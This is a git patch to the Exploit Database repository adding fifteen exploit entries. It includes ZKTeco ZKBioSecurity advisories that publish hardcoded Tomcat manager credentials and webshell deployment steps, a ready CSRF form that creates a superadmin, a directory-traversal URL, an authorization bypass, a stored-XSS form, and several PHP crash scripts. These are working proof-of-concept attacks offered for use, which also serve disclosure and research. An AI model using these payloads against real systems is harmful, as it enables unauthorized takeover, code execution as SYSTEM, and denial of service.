From 3a2154afbd60a7867fd1b9e160c953a881e45c47 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 1 Sep 2016 05:08:40 +0000
Subject: [PATCH] DB: 2016-09-01

15 new exploits

WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
PHP 5.0.0 - snmpwalkoid() Local Denial of Service
PHP 5.0.0 - fbird_[p]connect() Local Denial of Service
PHP 5.0.0 - snmpwalk() Local Denial of Service
PHP 5.0.0 - snmprealwalk() Local Denial of Service
PHP 5.0.0 - snmpset() Local Denial of Service
PHP 7.0 - AppendIterator::append Local Denial of Service
ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation
ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation
ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution
ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery
ZKTeco ZKBioSecurity 3.0 - Directory Traversal
ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass
ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting
PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service
---
 files.csv                         |  15 ++++
 platforms/jsp/webapps/40324.txt   |  98 ++++++++++++++++++++++++
 platforms/jsp/webapps/40325.html  |  72 ++++++++++++++++++
 platforms/jsp/webapps/40326.txt   |  53 +++++++++++++
 platforms/jsp/webapps/40327.txt   |  80 ++++++++++++++++++++
 platforms/jsp/webapps/40328.html  |  57 ++++++++++++++
 platforms/php/dos/40316.php       |  15 ++++
 platforms/php/dos/40317.php       |  16 ++++
 platforms/php/dos/40318.php       |  15 ++++
 platforms/php/dos/40319.php       |  15 ++++
 platforms/php/dos/40320.php       |  15 ++++
 platforms/php/dos/40321.php       |  12 +++
 platforms/php/dos/40329.php       |  17 +++++
 platforms/php/webapps/2032.pl     |   2 +-
 platforms/php/webapps/2035.php    |   2 +-
 platforms/php/webapps/2050.php    |   2 +-
 platforms/php/webapps/2068.php    |   2 +-
 platforms/php/webapps/2088.php    |   2 +-
 platforms/php/webapps/2095.txt    |   2 +-
 platforms/php/webapps/2096.txt    |   2 +-
 platforms/php/webapps/2098.txt    |   2 +-
 platforms/php/webapps/2100.txt    |   2 +-
 platforms/php/webapps/2102.txt    |   2 +-
 platforms/php/webapps/2114.htm    |   2 +-
 platforms/php/webapps/2116.txt    |   2 +-
 platforms/php/webapps/2117.php    |   2 +-
 platforms/php/webapps/2118.php    |   2 +-
 platforms/php/webapps/2123.txt    |   2 +-
 platforms/php/webapps/2128.txt    |   2 +-
 platforms/php/webapps/37389.txt   |   2 +-
 platforms/php/webapps/40295.txt   | 119 ++++++++++++++++++++++++++++++
 platforms/windows/dos/2039.pl     |   2 +-
 platforms/windows/local/2094.c    |   2 +-
 platforms/windows/local/40322.txt | 112 ++++++++++++++++++++++++++++
 platforms/windows/local/40323.txt |  49 ++++++++++++
 35 files changed, 779 insertions(+), 19 deletions(-)
 create mode 100755 platforms/jsp/webapps/40324.txt
 create mode 100755 platforms/jsp/webapps/40325.html
 create mode 100755 platforms/jsp/webapps/40326.txt
 create mode 100755 platforms/jsp/webapps/40327.txt
 create mode 100755 platforms/jsp/webapps/40328.html
 create mode 100755 platforms/php/dos/40316.php
 create mode 100755 platforms/php/dos/40317.php
 create mode 100755 platforms/php/dos/40318.php
 create mode 100755 platforms/php/dos/40319.php
 create mode 100755 platforms/php/dos/40320.php
 create mode 100755 platforms/php/dos/40321.php
 create mode 100755 platforms/php/dos/40329.php
 create mode 100755 platforms/php/webapps/40295.txt
 create mode 100755 platforms/windows/local/40322.txt
 create mode 100755 platforms/windows/local/40323.txt

diff --git a/files.csv b/files.csv
index f55a35c8e..70a16ec1c 100755
--- a/files.csv
+++ b/files.csv
@@ -36439,8 +36439,23 @@ id,file,description,date,author,platform,type,port
 40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80
 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
 40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0
+40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
 40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0
 40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
 40314,platforms/php/dos/40314.php,"PHP 5.0.0 - hw_docbyanchor() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
 40315,platforms/php/dos/40315.php,"PHP 5.0.0 - html_doc_file() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
+40316,platforms/php/dos/40316.php,"PHP 5.0.0 - snmpwalkoid() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
+40317,platforms/php/dos/40317.php,"PHP 5.0.0 - fbird_[p]connect() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
+40318,platforms/php/dos/40318.php,"PHP 5.0.0 - snmpwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
+40319,platforms/php/dos/40319.php,"PHP 5.0.0 - snmprealwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
+40320,platforms/php/dos/40320.php,"PHP 5.0.0 - snmpset() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
+40321,platforms/php/dos/40321.php,"PHP 7.0 - AppendIterator::append Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
+40322,platforms/windows/local/40322.txt,"ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
+40323,platforms/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
+40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
+40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery",2016-08-31,LiquidWorm,jsp,webapps,8088
+40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
+40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
+40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
+40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
diff --git a/platforms/jsp/webapps/40324.txt b/platforms/jsp/webapps/40324.txt
new file mode 100755
index 000000000..dd8a71ec5
--- /dev/null
+++ b/platforms/jsp/webapps/40324.txt
@@ -0,0 +1,98 @@
+ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution
+
+
+Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
+Product web page: http://www.zkteco.com
+Affected version: 3.0.1.0_R_230
+                  Platform: 3.0.1.0_R_230
+                  Personnel: 1.0.1.0_R_1916
+                  Access: 6.0.1.0_R_1757
+                  Elevator: 2.0.1.0_R_777
+                  Visitor: 2.0.1.0_R_877
+                  Video:2.0.1.0_R_489
+                  Adms: 1.0.1.0_R_197
+
+Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
+platform developed by ZKTeco. It contains four integrated modules: access
+control, video linkage, elevator control and visitor management. With an
+optimized system architecture designed for high level biometric identification
+and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
+solution for a whole new user experience.
+
+Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
+The application comes bundled with a pre-configured apache tomcat server and an
+exposed 'manager' application that after authenticating with the credentials:
+username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
+malicious WAR archive containing a JSP application to be uploaded, thus giving
+the attacker the ability to execute arbitrary code with SYSTEM privileges.
+
+Ref: https://www.exploit-db.com/exploits/31433/
+
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+           Microsoft Windows 7 Professional SP1 (EN)
+           Apache-Coyote/1.1
+           Apache Tomcat/7.0.56
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5362
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php
+
+
+18.07.2016
+
+--
+
+
+Contents of tomcat-users.xml:
+-----------------------------
+
+C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:
+
+<?xml version='1.0' encoding='utf-8'?>
+...
+...
+...
+<role rolename="manager-gui"/>  
+<role rolename="manager-script"/>  
+<role rolename="manager-jmx"/>  
+<role rolename="manager-status"/>  
+<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>  
+</tomcat-users>
+
+-----------------------------
+
+
+Open Manager application and login:
+-----------------------------------
+
+http://127.0.0.1:8088/manager (zkteco:zkt123)
+
+
+Deploy JSP webshell, issue command:
+-----------------------------------
+
+- Request: whoami
+- Response: nt authority\system
+
+
+call the findConnectors() method of the Service use:
+----------------------------------------------------
+
+http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
+
+Response:
+
+OK - Operation findConnectors returned:
+  Connector[HTTP/1.1-8088]
+  Connector[AJP/1.3-8019]
+
+
+List of all loaded servlets:
+----------------------------
+
+http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet
diff --git a/platforms/jsp/webapps/40325.html b/platforms/jsp/webapps/40325.html
new file mode 100755
index 000000000..15e4e2291
--- /dev/null
+++ b/platforms/jsp/webapps/40325.html
@@ -0,0 +1,72 @@
+<!--
+
+ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit
+
+
+Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
+Product web page: http://www.zkteco.com
+Affected version: 3.0.1.0_R_230
+                  Platform: 3.0.1.0_R_230
+                  Personnel: 1.0.1.0_R_1916
+                  Access: 6.0.1.0_R_1757
+                  Elevator: 2.0.1.0_R_777
+                  Visitor: 2.0.1.0_R_877
+                  Video:2.0.1.0_R_489
+                  Adms: 1.0.1.0_R_197
+
+Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
+platform developed by ZKTeco. It contains four integrated modules: access
+control, video linkage, elevator control and visitor management. With an
+optimized system architecture designed for high level biometric identification
+and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
+solution for a whole new user experience.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+           Microsoft Windows 7 Professional SP1 (EN)
+           Apache-Coyote/1.1
+           Apache Tomcat/7.0.56
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5364
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
+
+
+18.07.2016
+
+-->
+
+
+<html>
+  <body>
+    <form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="authUser&#46;username" value="thricer" />
+      <input type="hidden" name="authUser&#46;loginPwd" value="111111" />
+      <input type="hidden" name="repassword" value="111111" />
+      <input type="hidden" name="authUser&#46;isActive" value="true" />
+      <input type="hidden" name="authUser&#46;isSuperuser" value="true" />
+      <input type="hidden" name="groupIds" value="1" />
+      <input type="hidden" name="deptIds" value="1" />
+      <input type="hidden" name="areaIds" value="1" />
+      <input type="hidden" name="authUser&#46;email" value="lab@zeroscience.mk" />
+      <input type="hidden" name="authUser&#46;name" value="test" />
+      <input type="hidden" name="authUser&#46;lastName" value="lasttest" />
+      <input type="hidden" name="fingerTemplate" value="&#13;" />
+      <input type="hidden" name="fingerId" value="&#13;" />
+      <input type="hidden" name="logMethod" value="add" />
+      <input type="hidden" name="un" value="1471451964349_2769" />
+      <input type="hidden" name="systemCode" value="base" />
+      <input type="submit" value="Go" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/jsp/webapps/40326.txt b/platforms/jsp/webapps/40326.txt
new file mode 100755
index 000000000..b12dbe5a0
--- /dev/null
+++ b/platforms/jsp/webapps/40326.txt
@@ -0,0 +1,53 @@
+
+ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability
+
+
+Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
+Product web page: http://www.zkteco.com
+Affected version: 3.0.1.0_R_230
+                  Platform: 3.0.1.0_R_230
+                  Personnel: 1.0.1.0_R_1916
+                  Access: 6.0.1.0_R_1757
+                  Elevator: 2.0.1.0_R_777
+                  Visitor: 2.0.1.0_R_877
+                  Video:2.0.1.0_R_489
+                  Adms: 1.0.1.0_R_197
+
+Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
+platform developed by ZKTeco. It contains four integrated modules: access
+control, video linkage, elevator control and visitor management. With an
+optimized system architecture designed for high level biometric identification
+and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
+solution for a whole new user experience.
+
+Desc: File path manipulation vulnerabilities arise when user-controllable data
+is placed into a file or URL path that is used on the server to access
+local resources, which may be within or outside the web root. An attacker can
+modify the file path to access different resources, which may contain sensitive
+information. Even where an attack is constrained within the web root, it is often
+possible to retrieve items that are normally protected from direct access, such
+as application configuration files, the source code for server-executable scripts,
+or files with extensions that the web server is not configured to serve directly.
+
+
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+           Microsoft Windows 7 Professional SP1 (EN)
+           Apache-Coyote/1.1
+           Apache Tomcat/7.0.56
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5365
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php
+
+
+18.07.2016
+
+--
+
+
+http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
diff --git a/platforms/jsp/webapps/40327.txt b/platforms/jsp/webapps/40327.txt
new file mode 100755
index 000000000..2de2f91fa
--- /dev/null
+++ b/platforms/jsp/webapps/40327.txt
@@ -0,0 +1,80 @@
+ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass
+
+
+Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
+Product web page: http://www.zkteco.com
+Affected version: 3.0.1.0_R_230
+                  Platform: 3.0.1.0_R_230
+                  Personnel: 1.0.1.0_R_1916
+                  Access: 6.0.1.0_R_1757
+                  Elevator: 2.0.1.0_R_777
+                  Visitor: 2.0.1.0_R_877
+                  Video:2.0.1.0_R_489
+                  Adms: 1.0.1.0_R_197
+
+Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
+platform developed by ZKTeco. It contains four integrated modules: access
+control, video linkage, elevator control and visitor management. With an
+optimized system architecture designed for high level biometric identification
+and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
+solution for a whole new user experience.
+
+Desc: The issue exist due to the way visLogin.jsp script processes the login
+request via the 'EnvironmentUtil.getClientIp(request)' method. It runs a check
+whether the request is coming from the local machine and sets the ip variable
+to '127.0.0.1' if equal to 0:0:0:0:0:0:0:1. The ip variable is then used as a
+username value with the password '123456' to authenticate and disclose sensitive
+information and/or do unauthorized actions. 
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+           Microsoft Windows 7 Professional SP1 (EN)
+           Apache-Coyote/1.1
+           Apache Tomcat/7.0.56
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5367
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
+
+
+18.07.2016
+
+--
+
+
+C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
+---------------------------------------------------------------------------------
+
+1:  <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
+2:  <%@page import="com.zk.common.util.EnvironmentUtil"%>
+3:  <%
+4:  String path = request.getContextPath();
+5:  String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
+6:
+7:  String ip= EnvironmentUtil.getClientIp(request);
+8:  if("0:0:0:0:0:0:0:1".equals(ip))
+9:  {
+10:     ip = "127.0.0.1";
+11: }
+12:
+13: %>
+14: <jsp:include  page="login.jsp"/>
+15:   <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>
+16:
+17:   <script>
+18:       function autoLogin()
+19:       {
+20:                 $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
+21:                 $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
+22:         var ip = "<%=ip%>";
+23:         $("#userLoginForm input[name='username']").val(ip);
+24:         $("#userLoginForm input[name='password']").val("123456");
+25:         $('#userLoginForm').submit();
+26:       }
+27:       window.onload=autoLogin;
+28: </script>
+
+---------------------------------------------------------------------------------
diff --git a/platforms/jsp/webapps/40328.html b/platforms/jsp/webapps/40328.html
new file mode 100755
index 000000000..6eb428a6d
--- /dev/null
+++ b/platforms/jsp/webapps/40328.html
@@ -0,0 +1,57 @@
+<!--
+
+ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
+
+
+Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
+Product web page: http://www.zkteco.com
+Affected version: 5.3.12252
+
+Summary: ZKAccess Systems are built on flexible, open technology to provide
+management, real-time monitoring, and control of your access control system-all
+from a browser, with no additional software to install. Our secure Web-hosted
+infrastructure and centralized online administration reduce your IT costs and
+allow you to easily manage all of your access points in a single location. C3-100's
+versatile design features take care of present and future needs with ease and
+efficiency. It is one of the most rugged and reliable controllers on the market,
+with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
+via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
+cardholders.
+
+Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
+sanitised before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context of an affected
+site.
+
+Tested on: CherryPy/3.1.0beta3 WSGI Server
+           Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
+           Python 2.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5368
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
+
+
+18.07.2016
+
+-->
+
+
+<html>
+  <body>
+    <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
+      <input type="hidden" name="pk" value="None" />
+      <input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
+      <input type="hidden" name="holiday&#95;type" value="1" />
+      <input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
+      <input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
+      <input type="hidden" name="loop&#95;by&#95;year" value="2" />
+      <input type="hidden" name="memo" value=""><script>alert&#40;2&#41;<&#47;script>" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/php/dos/40316.php b/platforms/php/dos/40316.php
new file mode 100755
index 000000000..5ace1b5d8
--- /dev/null
+++ b/platforms/php/dos/40316.php
@@ -0,0 +1,15 @@
+<?php
+#############################################################################
+## PHP 5.0.0 snmpwalkoid() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
+
+$str = str_repeat('A', 9999);
+snmpwalkoid('127.0.0.1', 'public', $str); 
+?>
\ No newline at end of file
diff --git a/platforms/php/dos/40317.php b/platforms/php/dos/40317.php
new file mode 100755
index 000000000..8af87c421
--- /dev/null
+++ b/platforms/php/dos/40317.php
@@ -0,0 +1,16 @@
+<?php
+#############################################################################
+## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("interbase")) die("You need interbase extension loaded!");
+
+$str = str_repeat('A', 9999);
+//fbird_connect($str);
+fbird_pconnect($str);
+?>
\ No newline at end of file
diff --git a/platforms/php/dos/40318.php b/platforms/php/dos/40318.php
new file mode 100755
index 000000000..d264fc0c5
--- /dev/null
+++ b/platforms/php/dos/40318.php
@@ -0,0 +1,15 @@
+<?php
+#############################################################################
+## PHP 5.0.0 snmpwalk() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
+
+$str = str_repeat('A', 9999);
+snmpwalk('127.0.0.1', 'public', $str);
+?>
\ No newline at end of file
diff --git a/platforms/php/dos/40319.php b/platforms/php/dos/40319.php
new file mode 100755
index 000000000..1b13331f7
--- /dev/null
+++ b/platforms/php/dos/40319.php
@@ -0,0 +1,15 @@
+<?php
+#############################################################################
+## PHP 5.0.0 snmprealwalk() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
+
+$str = str_repeat('A', 9999);
+snmprealwalk('127.0.0.1', 'public', $str);
+?>
\ No newline at end of file
diff --git a/platforms/php/dos/40320.php b/platforms/php/dos/40320.php
new file mode 100755
index 000000000..5b224b81f
--- /dev/null
+++ b/platforms/php/dos/40320.php
@@ -0,0 +1,15 @@
+<?php
+#############################################################################
+## PHP 5.0.0 snmpset() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
+
+$str = str_repeat('A', 9999);
+snmpset("localhost", 'public', $str, '', '');
+?>
\ No newline at end of file
diff --git a/platforms/php/dos/40321.php b/platforms/php/dos/40321.php
new file mode 100755
index 000000000..3b1aefddd
--- /dev/null
+++ b/platforms/php/dos/40321.php
@@ -0,0 +1,12 @@
+<?php
+#############################################################################
+## PHP 7.0 AppendIterator::append Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
+## Date: 31/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+$tmp = new AppendIterator();
+$tmp->append($tmp); // Crash
+?>
\ No newline at end of file
diff --git a/platforms/php/dos/40329.php b/platforms/php/dos/40329.php
new file mode 100755
index 000000000..045dc8e55
--- /dev/null
+++ b/platforms/php/dos/40329.php
@@ -0,0 +1,17 @@
+<?php
+#############################################################################
+## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
+## Date: 31/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+class jsonTmp implements JsonSerializable {
+	function jsonSerialize() {
+		$jsonTmp = new jsonTmp();
+		return $jsonTmp;
+	}
+}
+json_encode(new jsonTmp());
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/2032.pl b/platforms/php/webapps/2032.pl
index 327a428ca..e3f573e97 100755
--- a/platforms/php/webapps/2032.pl
+++ b/platforms/php/webapps/2032.pl
@@ -1,4 +1,4 @@
-                        #==================================================================================================
+#==================================================================================================
 #!/usr/bin/perl
 use IO::Socket;
 #==================================================================================================
diff --git a/platforms/php/webapps/2035.php b/platforms/php/webapps/2035.php
index aa32cdb92..e789e1344 100755
--- a/platforms/php/webapps/2035.php
+++ b/platforms/php/webapps/2035.php
@@ -1,4 +1,4 @@
-                        #!/usr/bin/php -q -d short_open_tag=on
+#!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
 echo "by rgod rgod@autistici.org\n";
diff --git a/platforms/php/webapps/2050.php b/platforms/php/webapps/2050.php
index 70719c6e4..aadc387ca 100755
--- a/platforms/php/webapps/2050.php
+++ b/platforms/php/webapps/2050.php
@@ -1,4 +1,4 @@
-                        #!/usr/bin/php -q -d short_open_tag=on
+#!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
 echo "by rgod rgod@autistici.org\r\n";
diff --git a/platforms/php/webapps/2068.php b/platforms/php/webapps/2068.php
index 38d356bb6..c92936570 100755
--- a/platforms/php/webapps/2068.php
+++ b/platforms/php/webapps/2068.php
@@ -1,4 +1,4 @@
-            #!/usr/bin/php -q -d short_open_tag=on
+#!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "X7 Chat <=2.0.4 'old_prefix' blind SQL injection / privilege escalation exploit\r\n";
 echo "by rgod rgod@autistici.org\r\n";
diff --git a/platforms/php/webapps/2088.php b/platforms/php/webapps/2088.php
index b637d0fb7..2caac73a0 100755
--- a/platforms/php/webapps/2088.php
+++ b/platforms/php/webapps/2088.php
@@ -1,4 +1,4 @@
-                        #!/usr/bin/php -q -d short_open_tag=on
+#!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
 echo "by rgod rgod@autistici.org\n";
diff --git a/platforms/php/webapps/2095.txt b/platforms/php/webapps/2095.txt
index e82419da1..d4bffe909 100755
--- a/platforms/php/webapps/2095.txt
+++ b/platforms/php/webapps/2095.txt
@@ -1,4 +1,4 @@
-                        ###########################    www.system-defacers.org         ###############
+###########################    www.system-defacers.org         ###############
 #    Found By CeNGiZ-HaN cengiz-han@system-defacers.org
 #    phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
 ############################################################################
diff --git a/platforms/php/webapps/2096.txt b/platforms/php/webapps/2096.txt
index 8f83f3ab4..c53324361 100755
--- a/platforms/php/webapps/2096.txt
+++ b/platforms/php/webapps/2096.txt
@@ -1,4 +1,4 @@
-            +--------------------------------------------------------------------
++--------------------------------------------------------------------
 +
 + MyNewsGroups :) v. 0.6b <= Remote File Inclusion
 +
diff --git a/platforms/php/webapps/2098.txt b/platforms/php/webapps/2098.txt
index 17f8bbcf3..43a3c1969 100755
--- a/platforms/php/webapps/2098.txt
+++ b/platforms/php/webapps/2098.txt
@@ -1,4 +1,4 @@
-                        +--------------------------------------------------------------------
++--------------------------------------------------------------------
 +
 + TSEP 0.9.4.2
 +
diff --git a/platforms/php/webapps/2100.txt b/platforms/php/webapps/2100.txt
index 3e3e2ab81..b55d336d7 100755
--- a/platforms/php/webapps/2100.txt
+++ b/platforms/php/webapps/2100.txt
@@ -1,4 +1,4 @@
-                        +--------------------------------------------------------------------
++--------------------------------------------------------------------
 +
 + PHPAuction 2.1 Remote File Inclusion
 +
diff --git a/platforms/php/webapps/2102.txt b/platforms/php/webapps/2102.txt
index c0ad6943f..7b7ae3afb 100755
--- a/platforms/php/webapps/2102.txt
+++ b/platforms/php/webapps/2102.txt
@@ -1,4 +1,4 @@
-                        #=================================================================
+#=================================================================
 #Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
 #================================================================
 #                                                                |
diff --git a/platforms/php/webapps/2114.htm b/platforms/php/webapps/2114.htm
index 03fb73d6b..1f2f06dcb 100755
--- a/platforms/php/webapps/2114.htm
